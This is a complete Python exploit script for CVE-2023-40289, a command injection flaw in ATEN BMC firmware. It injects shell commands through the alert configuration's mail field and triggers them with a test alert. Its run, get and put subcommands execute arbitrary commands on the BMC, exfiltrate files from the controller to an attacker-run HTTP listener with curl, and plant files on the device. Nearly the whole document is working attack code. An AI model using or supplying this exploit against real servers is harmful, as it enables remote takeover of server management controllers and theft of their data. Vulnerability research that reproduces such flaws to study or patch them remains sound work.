#!/usr/bin/env python3 """ Exploit for CVE-2023-40289, a command injection vulnerability in ATEN's BMC firmware. Based on information and code from https://binarly.io/advisories/BRLY-2023-001/ """ import queue import re import stat import sys import threading import time import typing as t from dataclasses import dataclass from http.server import BaseHTTPRequestHandler, HTTPServer from pathlib import Path, PurePosixPath import click import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) @dataclass class CliArgs: target: str lhost: str lport: int delay: int | float class Handler(BaseHTTPRequestHandler): """Simple handler for HTTP requests.""" def do_GET(self): """Handle an HTTP GET request. Simply return static file content.""" self.send_response(200) # OK self.send_header("Conent-Type", "application/octet-stream") self.end_headers() self.wfile.write(self.server.static_content) def do_POST(self): """Handle an HTTP POST request. Store the request body in the server's queue.""" content_length = int(self.headers.get("Content-Length", 0)) body = self.rfile.read(content_length) self.send_response(202) # Accepted self.end_headers() self.server.q.put(body) def log_message(self, *args): # Noop method to silence the send_response method. pass def run_http_server(static_content: bytes = b""): """Run an HTTP server in a background thread. This server only accepts a single request and terminates after handling it. Args: static_content: Static content to server for GET requests. Returns: A tuple consisting of the background thread and a Queue from which the content of a POST request can be read. """ handler = HTTPServer(("", args.lport), Handler) # Attach a queue for communicating data back to the main thread. q: queue.Queue[bytes] = queue.Queue() handler.q = q # Attach some static content to serve to GET requests. handler.static_content = static_content # Run an HTTP server in a background thread. thread = threading.Thread(target=handler.handle_request) thread.daemon = True thread.start() return thread, q def store_payload(payload: str, index: int = 0): """Store the payload command in the target BMC's configuration. Args: payload: The command to run on the target BMC. index: Store the command at this alert index. Raises: ValueError: The payload is too long. RuntimeError: The target did not accept the payload. """ if not payload.startswith(";"): payload = f";{payload}" if "@" not in payload: # The payload is only accepted if it contains an @ somewhere. Prepending an @ does # not do any harm, except that it increases the length. So we only do it if # necessary. payload = f"@{payload}" if len(payload) >= 64: raise ValueError( f"Payload too long ({len(payload)} chars). A maximum of 63 character is allowed. Sorry." ) # End the command. It does not seem to hurt if this brings the payload over the length # limit. payload += ";:" data = { "op": "config_alert", "destination": "192.168.0.10", "severity": "16", "mail": payload, "sub": "test", "msg": "test", "index": str(index), "fun": "m", } r = session.post(url, data=data, verify=False) if r.status_code != 200: raise RuntimeError( f"Could not store payload {payload} at index {index}. Target returned {r.status_code} ({r.reason})." ) def trigger_exploit(index: int = 0) -> None: """Trigger running a previously stored payload command. Args: index: Trigger the command stored at this alert index. Raises: RuntimeError: The target BMC returned an unexpected error. """ data = {"op": "send_test_alert", "index": str(index)} r = session.post(url, data=data, verify=False) if r.status_code != 200: raise RuntimeError( f"Could not trigger exploit at index {index}. Target returned {r.status_code} ({r.reason})." ) def get_file(path: str | PurePosixPath, timeout: int = 15, index: int = 1) -> bytes: """Get the file at the given path from the BMC by triggering an upload to a local handler. Args: path: Absolute path of the file on the target BMC to get. timeout: How long to wait for the upload to complete (in seconds). index: Store the upload command at this alert index. Returns: The file's contents. Raises: RuntimeError: Waiting for the file upload timed out. """ thread, q = run_http_server() # Send the file to our HTTP server. store_payload(f"curl --data-binary @{path} {handler_url}", index=index) time.sleep(0.1) trigger_exploit(index=index) # Wait for the HTTP server to finish. for _ in range(timeout): thread.join(1) if not thread.is_alive(): break else: raise RuntimeError() return q.get() def login(username: str, password: str) -> None: """Log in to the target BMC with username and password. Args: username: Log in as this user. password: The password for the given user. Raises: requests.ConnectionError: Could not connect to the target BMC. requests.HTTPError: The target BMC returned an unexpected response. """ r = session.post( f"{args.target}/cgi/login.cgi", {"name": username, "pwd": password}, verify=False ) r.raise_for_status() def set_csrf_token(): """Get the current CSRF token value and add it to the global session object. Raises: requests.HTTPError: The target BMC returned an unexpected response. """ r = session.get(f"{args.target}/cgi/url_redirect.cgi?url_name=topmenu", verify=False) r.raise_for_status() m = re.search(r'SmcCsrfInsert\s*\("CSRF_TOKEN",\s*"([^"]+)"\);', r.text) session.headers["Csrf_token"] = m.group(1) def _disable_password_prompt(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any: """Disable the interactive prompt for the (missing) --password option. Args: ctx: The current click Context. param: The current click Parameter. value: The current click parameter's value. Returns: The unchanged value. """ if value: for p in ctx.command.params: if isinstance(p, click.Option) and p.name == "password": p.prompt = None return value @click.group( context_settings={"auto_envvar_prefix": "BMC"}, no_args_is_help=True, help=r"""Exploit CVE-2023-40289 on BMCs with ATEN firmware. /!\ Caution! This script will overwrite alerts without prompting! /!\ """, epilog="Note: All options may also be given as environment variables with the prefix 'BMC_' (e.g. BMC_TARGET).", ) @click.option("--target", required=True, help="URL of the target BMC's web UI.") @click.option( "-h", "--lhost", help="IP address or host name of this system to get payload output. Limited to ~35 characters.", ) @click.option( "-l", "--lport", default=80, type=click.INT, help="Local port to run an HTTP server on to get payload output.", show_default=True, ) @click.option( "-s", "--sid", help="A valid session ID for an administrative user on the target system.", callback=_disable_password_prompt, ) @click.option( "-u", "--username", help="The name of an administrative user to log in as. Ignored if --sid is given.", ) @click.option( "-p", "--password", prompt=True, hide_input=True, help="The password of the given user.", ) @click.option( "--delay", type=click.FLOAT, default=1.5, show_default=True, help="Delay between running a command and retrieving its output.", ) def cli(target: str, lhost: str, lport: int, sid: str, username: str, password: str, delay: float): # Store global CLI arguments for subcommands. global args args = CliArgs(target, lhost, lport, delay) # Set up some basic HTTP connection parameters. global url url = f"{target}/cgi/op.cgi" if sid: session.cookies.set("SID", sid) elif username and password: login(username, password) else: raise click.UsageError("Session ID or username and password is required.") set_csrf_token() session.headers["Referer"] = target if lhost: global handler_url # Note: We intentionally omit the URL scheme to save precious payload characters. # Curl will figure it out. handler_url = lhost if lport != 80: handler_url = f"{handler_url}:{lport}" @cli.command(context_settings={"ignore_unknown_options": True}) @click.argument("payload", nargs=-1, type=click.UNPROCESSED) def run(payload: str): """Run the PAYLOAD command on the target BMC. PAYLOAD is limited to ~61 characters.""" payload = " ".join(payload) get_output = False if args.lhost is None: print("[!] Local host address not given. You will not get the output.", file=sys.stderr) elif len(payload) < 53: # Looks like the payload is short enough. We'll redirect the output to a file so we # can get it later. payload += "&>/tmp/x" get_output = True elif len(payload) < 54: # Get stdout only. Better than nothing. payload += ">/tmp/x" get_output = True else: # For a long payload, we can't redirect the output, because that would bring the payload # over the 63 character length limit. print("[!] Payload is too long. You will not get the output.", file=sys.stderr) # Run the payload. store_payload(payload) print("[✓] Set payload command", file=sys.stderr) time.sleep(0.1) trigger_exploit() print("[✓] Triggered payload command", file=sys.stderr) # Retrieve the output. if get_output: time.sleep(args.delay) print("[.] Getting command output", file=sys.stderr) try: output = get_file("/tmp/x") except RuntimeError: print("[!] Could not get command output.", file=sys.stderr) else: if output: try: # Print the output as text. print(output.decode(), end="") except UnicodeDecodeError: # Output is not valid UTF-8. It's probably binary data then. Output it raw. sys.stdout.buffer.write(output) sys.stdout.buffer.flush() @cli.command() @click.option( "--dest", default=Path("."), type=click.Path(path_type=Path), help="Local destination directory in which to store the file.", ) @click.option( "--flat/--no-flat", default=False, help="Do not/do replicate the original directory structure in the destination directory.", ) @click.argument("path", type=click.Path(path_type=PurePosixPath)) def get(path: PurePosixPath, dest: Path, flat: bool) -> int: """Get FILE from the target BMC and save it locally.""" print(f"[.] Triggering upload of {path} from BMC.", file=sys.stderr) try: content = get_file(path) except RuntimeError: print("[!] Could not get file.", file=sys.stderr) return 1 if not flat: dest = dest / path.parent.relative_to("/") dest.mkdir(parents=True, exist_ok=True) dest = dest / path.name dest.write_bytes(content) print(f"[✓] File contents written to {dest}.", file=sys.stderr) return 0 @cli.command() @click.argument("file", type=click.Path(exists=True, dir_okay=False, path_type=Path)) @click.argument("dest", type=click.Path(path_type=PurePosixPath)) def put(file: Path, dest: PurePosixPath) -> int: """Write local FILE to the BMC at DEST. Will restore local permissions on the target.""" content = file.read_bytes() mode = stat.S_IMODE(file.stat().st_mode) # Download the file from our HTTP server. store_payload(f"curl -o /tmp/dl {handler_url} &>/tmp/x", index=0) if mode != 0o644: store_payload(f"chmod {mode:o} /tmp/dl &>/tmp/x", index=1) store_payload(f"mv /tmp/dl {dest} &>/tmp/x", index=2) print("[✓] Set download payloads", file=sys.stderr) time.sleep(0.1) thread, q = run_http_server(content) trigger_exploit(index=0) # Wait for the HTTP server to finish. for _ in range(15): thread.join(1) if not thread.is_alive(): break else: print("[!] BMC did not download file.", file=sys.stderr) return 1 print(f"[✓] Downloaded {file} to BMC.", file=sys.stderr) if mode != 0o644: trigger_exploit(index=1) time.sleep(args.delay) try: output = get_file("/tmp/x", index=3) except RuntimeError: print("[!] Could not get command output.", file=sys.stderr) else: if output: print("[!] Could not set file mode.", file=sys.stderr) print(output.decode(), end="", file=sys.stderr) else: print("[✓] Set file mode.", file=sys.stderr) trigger_exploit(index=2) time.sleep(args.delay) try: output = get_file("/tmp/x", index=3) except RuntimeError: print("[!] Could not get command output.", file=sys.stderr) else: if output: print(f"[!] Could not move downloaded file to {dest} on BMC.", file=sys.stderr) print(output.decode(), end="", file=sys.stderr) else: print(f"[✓] Moved downloaded file to {dest} on BMC.", file=sys.stderr) return 0 # Define some global variables used throughout this script. args: CliArgs url: str session = requests.Session() handler_url: str if __name__ == "__main__": cli()